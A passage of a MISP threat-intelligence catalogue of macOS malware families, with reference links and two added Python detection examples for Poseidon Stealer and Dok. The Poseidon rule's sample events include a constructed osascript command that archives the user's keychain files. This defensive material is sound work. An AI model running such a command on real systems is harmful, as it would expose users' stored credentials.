- https://malpedia.caad.fkie.fraunhofer.de/details/osx.kandykorn - webarchive
- https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/ - webarchive
- https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2024/papers/Sugarcoating-KANDYKORN-a-sweet-dive-into-a-sophisticated-MacOS-backdoor.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KeRanger
Internal MISP references
UUID 01643bc9-bd61-42e8-b9f1-5fbf83dcd786 which can be used as unique global reference for KeRanger in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html - webarchive
- http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Keydnap
Internal MISP references
UUID 2173605b-bf44-4c76-b75a-09c53bb322d6 which can be used as unique global reference for Keydnap in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap - webarchive
- http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- https://github.com/eset/malware-ioc/tree/master/keydnap - webarchive
- https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KeySteal
According to SentinelOne, KeySteal targets files with the .keychain and keychain-db file extensions in the following locations.
Internal MISP references
UUID 53f359ed-6178-4d9e-958f-e79d5d4b3655 which can be used as unique global reference for KeySteal in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kitmos
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kitmos.
| Known Synonyms |
|---|
| KitM |
Internal MISP references
UUID 8a1b1c99-c149-4339-9058-db3b4084cdcd which can be used as unique global reference for Kitmos in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Komplex
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Komplex.
| Known Synonyms |
|---|
| JHUHUGIT |
| JKEYSKW |
| SedUploader |
Internal MISP references
UUID d26b5518-8d7f-41a6-b539-231e4962853e which can be used as unique global reference for Komplex in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/ - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kuiper (OS X)
Internal MISP references
UUID c39087ca-05b7-4374-aff1-116a73f2ba74 which can be used as unique global reference for Kuiper (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Lador
Internal MISP references
UUID 9c6b54ce-44a0-4d0c-89cb-6532c8f89d8d which can be used as unique global reference for Lador in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Lambert (OS X)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lambert (OS X).
| Known Synonyms |
|---|
| GreenLambert |
Internal MISP references
UUID 7433f3a8-f53c-4ba0-beff-e312fae9ad39 which can be used as unique global reference for Lambert (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Laoshu
Internal MISP references
UUID a13a2cb8-b0e6-483a-9916-f44969a2c42b which can be used as unique global reference for Laoshu in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Leverage
Internal MISP references
UUID 15daa766-f721-4fd5-95fb-153f5361fb87 which can be used as unique global reference for Leverage in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LockBit (OS X)
Internal MISP references
UUID 0821b5c8-db48-4d0e-a969-384dbd74a6c9 which can be used as unique global reference for LockBit (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.lockbit - webarchive
- https://www.linkedin.com/pulse/intrusion-insights-straight-from-leaked-operator-chats-ahmad-abdillah-p1ejc?utm_source=share&utm_medium=member_ios&utm_campaign=share_via - webarchive
- https://analyst1.com/lockbit-takedown-operation-cronos-a-long-awaited-psyops-against-ransomware/ - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation - webarchive
- https://www.washingtonpost.com/business/2024/02/20/lockbit-ransomware-cronos-nca-fbi/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://services.google.com/fh/files/misc/m-trends-2025-en.pdf - webarchive
- https://twitter.com/malwrhunterteam/status/1647384505550876675 - webarchive
- https://nationalcrimeagency.gov.uk/news/nca-leads-international-investigation-targeting-worlds-most-harmful-ransomware-group - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MacDownloader
Internal MISP references
UUID 910d3c78-1a9e-4600-a3ea-4aa5563f0f13 which can be used as unique global reference for MacDownloader in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MacInstaller
Internal MISP references
UUID d1f8af3c-719b-4f64-961b-8d89a2defa02 which can be used as unique global reference for MacInstaller in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MacRansom
Internal MISP references
UUID 66862f1a-5823-4a9a-bd80-439aaafc1d8b which can be used as unique global reference for MacRansom in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MacSpy
Internal MISP references
UUID c9915d41-d1fb-45bc-997e-5cd9c573d8e7 which can be used as unique global reference for MacSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MacVX
Internal MISP references
UUID 4db9012b-d3a1-4f19-935c-4dbc7fdd93fe which can be used as unique global reference for MacVX in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MaMi
Internal MISP references
UUID 7759534c-3298-42e9-adab-896d7e507f4f which can be used as unique global reference for MaMi in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Manuscrypt
Internal MISP references
UUID f85c3ec9-81f0-4dee-87e6-b3f6b235bfe7 which can be used as unique global reference for Manuscrypt in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt - webarchive
- https://twitter.com/BitsOfBinary/status/1321488299932983296 - webarchive
- https://www.wiz.io/blog/north-korean-tradertraitor-crypto-heist - webarchive
- https://www.anquanke.com/post/id/223817 - webarchive
- https://twitter.com/BitsOfBinary/status/1337330286787518464 - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mokes (OS X)
Internal MISP references
UUID bfbb6e5a-32dc-4842-936c-5d8497570c74 which can be used as unique global reference for Mokes (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes - webarchive
- https://objective-see.com/blog/blog_0x16.html - webarchive
- https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/ - webarchive
- https://objective-see.com/blog/blog_0x53.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mughthesec
Internal MISP references
UUID aa1bf4e5-9c44-42a2-84e5-7526e4349405 which can be used as unique global reference for Mughthesec in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NetWire
Internal MISP references
UUID f0d52afd-e7c9-4bd1-be8a-9ab09b14ea24 which can be used as unique global reference for NetWire in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OceanLotus
According to PCrisk, research shows that the OceanLotus backdoor targets macOS computers. The cyber criminals behind this backdoor have already used it to attack human rights and media organizations, some research institutes, and maritime construction companies.
The OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (the threat actors likely distribute the document via malspam emails).
Internal MISP references
UUID 65b7eff4-741c-445e-b4e0-8a4e4f673a65 which can be used as unique global reference for OceanLotus in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus - webarchive
- https://cocomelonc.github.io/malware/2025/01/19/malware-tricks-44.html - webarchive
- https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - webarchive
- https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/ - webarchive
- https://bluecyber.hashnode.dev/apt32-malware-an-in-depth-analysis - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html - webarchive
- https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/ - webarchive
- https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/ - webarchive
- https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam - webarchive
- https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468 - webarchive
- https://cocomelonc.github.io/malware/2025/02/24/malware-tricks-45.html - webarchive
- https://brandefense.io/blog/apt-groups/ocean-lotus-apt-group/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/ - webarchive
- https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Odyssey Stealer
Internal MISP references
UUID 361fe0b4-30b2-4b4f-a2d4-a7ad1a052056 which can be used as unique global reference for Odyssey Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Olyx
Internal MISP references
UUID cd397973-8f42-4c49-8322-414ea77ec773 which can be used as unique global reference for Olyx in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
oRAT
SentinelOne describes this as malware written in Go that mixes the authors' own custom code with code taken from public repositories.
Internal MISP references
UUID 699dac0f-092c-4c8e-85e9-6e3c86129190 which can be used as unique global reference for oRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.orat - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-unsigned-macos-orat-malware-gambles-for-the-win/ - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OSAMiner
Internal MISP references
UUID 89d0c423-c4ff-46e8-8c79-ea5e974e53e7 which can be used as unique global reference for OSAMiner in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Patcher
This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software such as Adobe Premiere Pro or Microsoft Office for Mac.
The downloaded torrent contained an application bundle in the form of a single zip file. After the fake application was launched, the main window of the fake cracking tool was displayed.
The file encryption process started once the misled victim clicked 'Start'. The ransomware then generated a random 25-character string and used it as the key for RC4 encryption of all of the user's files, and demanded a ransom in Bitcoin, as instructed in the 'README!.txt' file copied all over the user's directories.
Despite the thorough instructions, Patcher had no functionality to communicate with any C&C server, so the key never left the victim's machine and even its operators could not decrypt affected files. The randomly generated key was also too long to be guessed by brute force, leaving the encrypted data unrecoverable in any reasonable amount of time.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Patcher.
| Known Synonyms |
|---|
FileCoder |
Findzip |
Internal MISP references
UUID bad1057c-4f92-4747-a0ec-31bcc062dab8 which can be used as unique global reference for Patcher in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pearl Stealer
Internal MISP references
UUID d255cff1-5a66-45fe-8cd7-49218b50a572 which can be used as unique global reference for Pearl Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PintSized
Backdoor built as a fork of OpenSSH_6.0 with logging removed and hidden “-P” and “-z” command-line arguments; it contains the string “PuffySSH_5.8p1”.
Internal MISP references
UUID de13bec0-f443-4c5a-91fe-2223dad43be5 which can be used as unique global reference for PintSized in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pirrit
Internal MISP references
UUID b749ff3a-df68-4b38-91f1-649864eae52c which can be used as unique global reference for Pirrit in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit - webarchive
- http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/ - webarchive
- https://forensicitguy.github.io/analyzing-pirrit-adware-installer/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf - webarchive
- https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
POOLRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POOLRAT.
| Known Synonyms |
|---|
SIMPLESEA |
SIMPLETEA |
Internal MISP references
UUID bfd9e30e-ddc7-426f-8f77-4d2e1a846541 which can be used as unique global reference for POOLRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.poolrat - webarchive
- https://www.3cx.com/blog/news/mandiant-security-update2/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e - webarchive
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack - webarchive
- https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Poseidon (OS X)
Agent for the Mythic C2 framework, written in Go.
Internal MISP references
UUID e4ac9105-c3ad-41e2-846b-048e2bbedc6a which can be used as unique global reference for Poseidon (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Poseidon Stealer
macOS infostealer sold by an individual using the handle Rodrigo4. It currently ships as a disk image containing a bare Mach-O (no app bundle); when executed, the Mach-O spawns osascript to run an AppleScript that carries the actual infostealer payload. The AppleScript packs the stolen files into a ZIP archive and uploads it to a hardcoded C2 over HTTP.
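A process-tree rule for the execution chain described above, as an added example: it is not code from the malware, from GovCERT.ch, Red Canary or any other cited source. The event records are constructed; the paths, pids and inline script text are assumptions chosen to exercise the rule, not indicators from a real sample, and the (pid, ppid, path, args) record shape is likewise an assumption about whatever EDR or audit log is fed in.

```python
"""
Process-tree rule for the Poseidon Stealer execution chain: a bare Mach-O run
from a mounted disk image spawns osascript to run the AppleScript stealer.

Added example, not code from the malware or from any cited report. Event
records below are constructed; paths, pids and script text are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

OSASCRIPT = "/usr/bin/osascript"


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    path: str                 # executable path
    args: Tuple[str, ...]     # argv


def runs_from_mounted_image(path: str) -> bool:
    """Disk images mount under /Volumes/ on macOS; the boot volume is /."""
    return path.startswith("/Volumes/")


def inside_app_bundle(path: str) -> bool:
    return ".app/Contents/MacOS/" in path


def classify_osascript(child: ProcEvent, parent: ProcEvent) -> Tuple[str, List[str]]:
    """
    Score one osascript launch against its parent. Returns (severity, reasons):
    "high" when the parent is a bare Mach-O running from a mounted image (the
    full described chain), "medium" for a partial match, "" for no match.
    """
    if child.path != OSASCRIPT:
        return "", []
    on_image = runs_from_mounted_image(parent.path)
    bare = on_image and not inside_app_bundle(parent.path)
    inline = "-e" in child.args        # inline script; an assumption, see lead-in
    reasons = []
    if on_image:
        reasons.append(f"parent {parent.path} runs from a mounted disk image")
    if bare:
        reasons.append("parent is a bare Mach-O, not an .app bundle")
    if inline:
        reasons.append("AppleScript passed inline with -e")
    if bare:
        return "high", reasons
    if on_image or inline:
        return "medium", reasons
    return "", []


def detect(events: Iterable[ProcEvent]) -> List[Tuple[int, str, List[str]]]:
    """Index events by pid, then score every osascript against its parent."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for ev in sorted(by_pid.values(), key=lambda e: e.pid):
        parent = by_pid.get(ev.ppid)
        if parent is None:              # parent exited before it was logged; skip
            continue
        severity, reasons = classify_osascript(ev, parent)
        if severity:
            findings.append((ev.pid, severity, reasons))
    return findings


# Constructed events: a benign osascript, an installer-bundle case (partial
# match) and a bare-Mach-O-from-DMG case that matches the full chain.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "/sbin/launchd", ("launchd",)),
    ProcEvent(500, 1, "/Volumes/Setup/Setup", ("./Setup",)),
    ProcEvent(501, 500, OSASCRIPT, ("osascript", "-e",
              'do shell script "zip -r /tmp/out.zip ~/Library/Keychains"')),
    ProcEvent(600, 1, "/Applications/Script Editor.app/Contents/MacOS/Script Editor",
              ("Script Editor",)),
    ProcEvent(601, 600, OSASCRIPT, ("osascript", "/Users/alice/backup.scpt")),
    ProcEvent(700, 1, "/Volumes/Installer/Installer.app/Contents/MacOS/Installer",
              ("Installer",)),
    ProcEvent(701, 700, OSASCRIPT, ("osascript", "-e", 'display dialog "Installing"')),
]

if __name__ == "__main__":
    for pid, severity, reasons in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {severity}")
        for r in reasons:
            print("   -", r)
```

The rule keys on the parent's executable path rather than on the script contents because the AppleScript text is trivially changed between builds, while "osascript spawned by a bare Mach-O under /Volumes/" is the structural feature of the chain the description gives.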
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poseidon Stealer.
| Known Synonyms |
|---|
Rodrigo Stealer |
Internal MISP references
UUID 9eb9f899-acfb-4452-981f-5937aa1f47cc which can be used as unique global reference for Poseidon Stealer in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.poseidonstealer - webarchive
- https://github.com/govcert-ch/CTI/tree/main/20240627_macOS_PoseidonStealer - webarchive
- https://redcanary.com/blog/threat-intelligence/atomic-odyssey-poseidon-stealers/ - webarchive
- https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2024/poseidon_bericht.html - webarchive
- https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Proton RAT
Proton RAT is a Remote Access Trojan (RAT) designed specifically for macOS. It gives attackers complete remote control over the infected system: command execution, keystroke capture, access to the camera and microphone, and theft of credentials stored in browsers and password managers. It typically spreads through malicious or trojanized applications whose payload triggers once unsuspecting users download and install them. Proton RAT is known for its sophistication and evasion capabilities, including techniques to bypass detection by installed security solutions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Proton RAT.
| Known Synonyms |
|---|
Calisto |
Internal MISP references
UUID d7e31f19-8bf2-4def-8761-6c5bf7feaa44 which can be used as unique global reference for Proton RAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat - webarchive
- https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/ - webarchive
- https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf - webarchive
- https://securelist.com/calisto-trojan-for-macos/86543/ - webarchive
- https://objective-see.com/blog/blog_0x1F.html - webarchive
- https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does - webarchive
- https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/ - webarchive
- https://objective-see.com/blog/blog_0x1D.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/ - webarchive
- https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pureland
According to SentinelOne, this is an infostealer that targets, among other things, Zoom's encrypted database.
Internal MISP references
UUID ffacfa02-47f5-4287-a700-243e3d4f8d6d which can be used as unique global reference for Pureland in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pwnet
Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.
Internal MISP references
UUID 70059ec2-9315-4af7-b65b-2ec35676a7bb which can be used as unique global reference for Pwnet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dok
Dok, a.k.a. Retefe, is the macOS version of the Retefe banking trojan. It consists of a code-signed Mach-O dropper, usually malspammed as an app bundle inside a DMG disk image posing as a document. The dropper's primary purpose is to install a Tor client, a malicious CA certificate and a proxy PAC URL, so that traffic to targeted sites is redirected through the attackers' Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file that blocks access to Apple and VirusTotal domains. The macOS version shares its MO, many TTPs and infrastructure with its Windows counterpart.
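An audit for two of the host-level artifacts listed above (a hosts file that blackholes Apple and VirusTotal, and a PAC script that steers selected sites through a proxy), as an added example: it is not code from the malware or from any of the cited reports. The hosts lines, the PAC script, the proxy address and the target domains are constructed for this example and are not indicators from a real Dok sample.

```python
"""
Audit a hosts file and a proxy auto-config (PAC) script for the Dok/Retefe
pattern: watched domains pinned to a sinkhole, and selective proxying of
named sites through an unexpected endpoint.

Added example, not code from the malware or any cited report. All inputs
below are constructed.
"""
import ipaddress
import re
from typing import Iterable, List, Tuple

# Domains whose presence in /etc/hosts is a red flag on a Mac: Dok pins them
# so that Apple updates and VirusTotal lookups fail. Extend as needed.
WATCHED_DOMAINS = ("apple.com", "virustotal.com")

# Addresses that mean "drop the connection" rather than "resolve".
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}

_PROXY_DIRECTIVE = re.compile(r"\b(PROXY|HTTPS|SOCKS[45]?|HTTP)\s+([^;\"'\s]+)", re.IGNORECASE)
_TARGET_MATCH = re.compile(
    r"\b(?:dnsDomainIs|shExpMatch|localHostOrDomainIs)\s*\(\s*host\s*,\s*[\"']([^\"']+)[\"']",
    re.IGNORECASE,
)


def _is_watched(hostname: str) -> bool:
    host = hostname.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)


def suspicious_hosts_entries(hosts_text: str) -> List[Tuple[int, str, str, bool]]:
    """
    Return (line_no, ip, hostname, sinkholed) for every hosts entry that maps a
    watched domain. A stock macOS hosts file never mentions these domains, so
    any mapping is worth a look; a sinkhole address is the Dok pattern.
    """
    findings = []
    for n, raw in enumerate(hosts_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()        # drop comments
        if not line:
            continue
        ip, *names = line.split()
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue                               # malformed line, not a mapping
        for name in names:
            if _is_watched(name):
                findings.append((n, ip, name, ip in SINKHOLE_IPS))
    return findings


def pac_proxy_endpoints(pac_text: str) -> List[Tuple[str, str, str]]:
    """Every proxy a PAC script can return, as (scheme, host, port); DIRECT is ignored."""
    endpoints = []
    for scheme, hostport in _PROXY_DIRECTIVE.findall(pac_text):
        host, sep, port = hostport.rpartition(":")
        if not sep:                                # no port given
            host, port = hostport, ""
        endpoints.append((scheme.upper(), host, port))
    return endpoints


def pac_targeted_hosts(pac_text: str) -> List[str]:
    """Host patterns the PAC conditions on: the sites it selectively proxies."""
    return sorted({m.lower() for m in _TARGET_MATCH.findall(pac_text)})


def audit_pac(pac_text: str, allowed_proxies: Iterable[str] = ()) -> List[str]:
    """
    Reasons a PAC is suspicious: any proxy endpoint not on the allowlist
    (host:port strings), and any selective routing of named hosts, which is
    the MITM-of-selected-traffic setup the Dok description gives.
    """
    allowed = set(allowed_proxies)
    reasons = []
    for scheme, host, port in pac_proxy_endpoints(pac_text):
        endpoint = f"{host}:{port}" if port else host
        if endpoint not in allowed:
            reasons.append(f"unexpected proxy endpoint: {scheme} {endpoint}")
    targets = pac_targeted_hosts(pac_text)
    if targets:
        reasons.append("selectively proxied hosts: " + ", ".join(targets))
    return reasons


# Constructed inputs. On a real host read /etc/hosts and fetch the URL that
# `networksetup -getautoproxyurl <service>` reports for each network service.
SAMPLE_HOSTS = """\
##
# Host Database
##
127.0.0.1       localhost
255.255.255.255 broadcasthost
::1             localhost
0.0.0.0         apple.com www.apple.com swscan.apple.com
0.0.0.0         virustotal.com www.virustotal.com
"""

SAMPLE_PAC = """\
function FindProxyForURL(url, host) {
    if (shExpMatch(host, "*.examplebank.test") || dnsDomainIs(host, "login.example.test")) {
        return "PROXY 127.0.0.1:5555; DIRECT";
    }
    return "DIRECT";
}
"""

if __name__ == "__main__":
    for n, ip, name, sink in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"hosts line {n}: {name} -> {ip}{' (sinkholed)' if sink else ''}")
    for reason in audit_pac(SAMPLE_PAC):
        print("pac:", reason)
```

The third artifact, the malicious CA certificate, needs the keychain rather than a text file: on macOS `security dump-trust-settings -d` lists admin-level trust overrides, which is where a user-installed root shows up, and `security find-certificate -a -p /Library/Keychains/System.keychain` dumps the system keychain's certificates in PEM for offline comparison against a known-good baseline.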
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dok.
| Known Synonyms |
|---|
Retefe |
Internal MISP references
UUID 80acc956-d418-42e3-bddf-078695a01289 which can be used as unique global reference for Dok in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe - webarchive
- https://www.govcert.admin.ch/blog/33/the-retefe-saga - webarchive
- http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe - webarchive
- https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RustBucket (OS X)
Internal MISP references
UUID 03f356e6-296f-4195-bed0-9719a84887db which can be used as unique global reference for RustBucket (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.rustbucket - webarchive
- https://sansorg.egnyte.com/dl/3P3HxFiNgL - webarchive
- https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/ - webarchive
- https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket - webarchive
- https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/ - webarchive
- https://securelist.com/bluenoroff-new-macos-malware/111290/ - webarchive
- https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html - webarchive
- https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Shlayer
